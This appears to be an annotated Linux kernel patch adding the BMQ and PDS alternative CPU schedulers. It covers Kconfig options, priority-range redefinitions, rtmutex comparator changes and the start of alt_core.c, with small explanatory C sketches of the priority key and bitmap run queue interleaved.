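/* prio in bits 63..56, virtual deadline in the low 56 bits. */
static inline uint64_t pds_key(uint64_t prio, uint64_t deadline)
{
	return (prio << 56) | (deadline & ((1ULL << 56) - 1));
}

/* Lower key wins: compares priority, then deadline, in one operation. */
static inline int pds_key_less(uint64_t a, uint64_t b)
{
	return a < b;
}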
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
-
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
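
Assuming the usual mainline values MAX_RT_PRIO = 100 and NICE_WIDTH = 40
(an assumption; neither is shown in this hunk), the redefinitions above work
out to the ranges checked by this standalone sketch:

/* Sanity-check sketch of the redefined priority ranges. */
#define MAX_RT_PRIO	100	/* assumed mainline value */
#define NICE_WIDTH	40	/* assumed mainline value */

/* BMQ: MIN_NORMAL_PRIO = 100, MAX_PRIO = 140, DEFAULT_PRIO = 120 */
_Static_assert(MAX_RT_PRIO + NICE_WIDTH == 140, "BMQ MAX_PRIO");
_Static_assert(MAX_RT_PRIO + NICE_WIDTH / 2 == 120, "BMQ DEFAULT_PRIO");

/* PDS: MIN_NORMAL_PRIO = 128, MAX_PRIO = 128 + 64 = 192,
 * DEFAULT_PRIO = 192 - 40 / 2 = 172 */
_Static_assert(128 + 64 == 192, "PDS MAX_PRIO");
_Static_assert(128 + 64 - NICE_WIDTH / 2 == 172, "PDS DEFAULT_PRIO");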
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
-
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
-
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
-
- #endif	/* !CONFIG_SMP */
-
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
-
- 	  If in doubt, use the default value.
-
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enables the alternative CPU schedulers.
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
-
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
-
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
-
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
-
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
-
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
-
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
-
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
-
- 	d->cpu_count += t1;
-
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
-
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
-
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -343,7 +343,7 @@ waiter_update_prio(struct rt_mutex_waite
- 	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
- 
- 	waiter->tree.prio = __waiter_prio(task);
--	waiter->tree.deadline = task->dl.deadline;
-+	waiter->tree.deadline = __tsk_deadline(task);
- }
- 
- /*
-@@ -364,16 +364,20 @@ waiter_clone_prio(struct rt_mutex_waiter
-  * Only use with rt_waiter_node_{less,equal}()
-  */
- #define task_to_waiter_node(p)	\
--	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- #define task_to_waiter(p)	\
- 	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
- 
- static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
- 					       struct rt_waiter_node *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -382,16 +386,22 @@ static __always_inline int rt_waiter_nod
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
- 						 struct rt_waiter_node *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -400,8 +410,10 @@ static __always_inline int rt_waiter_nod
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..572eab74418f
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7961 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/profile.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r1"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* The default time slice is 4 ms; it can be set via the kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
-+
-+/* Reschedule if less than this much time (about 100 us) is left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
-+ * the domain), this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for(i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Initialize the idle task and put it into the queue structure of the rq
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
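
The queue structure above is easy to model in isolation: one list head per
priority level plus a bitmap of non-empty levels, so picking the next task is
a find-first-set. A minimal userspace sketch, with a single 64-bit word
standing in for the kernel's bitmap:

#include <stdint.h>
#include <stddef.h>

#define NLEVELS	64

struct demo_node { struct demo_node *next, *prev; };

struct demo_queue {
	uint64_t bitmap;			/* bit n set: level n non-empty */
	struct demo_node heads[NLEVELS];	/* circular lists with sentinels */
};

static void demo_queue_init(struct demo_queue *q)
{
	q->bitmap = 0;
	for (int i = 0; i < NLEVELS; i++)
		q->heads[i].next = q->heads[i].prev = &q->heads[i];
}

/* Tail insert, like __SCHED_ENQUEUE_TASK later in this file. */
static void demo_enqueue(struct demo_queue *q, struct demo_node *n, int prio)
{
	struct demo_node *h = &q->heads[prio];

	n->prev = h->prev;
	n->next = h;
	h->prev->next = n;
	h->prev = n;
	q->bitmap |= 1ULL << prio;
}

/* Like sched_rq_first_task(): lowest set bit, head of that list. */
static struct demo_node *demo_first(struct demo_queue *q)
{
	if (!q->bitmap)
		return NULL;
	return q->heads[__builtin_ctzll(q->bitmap)].next;
}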
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* watermark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assumes that the idle task is always in the queue
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on, this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq
-+*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (NULL != lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq
-+*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
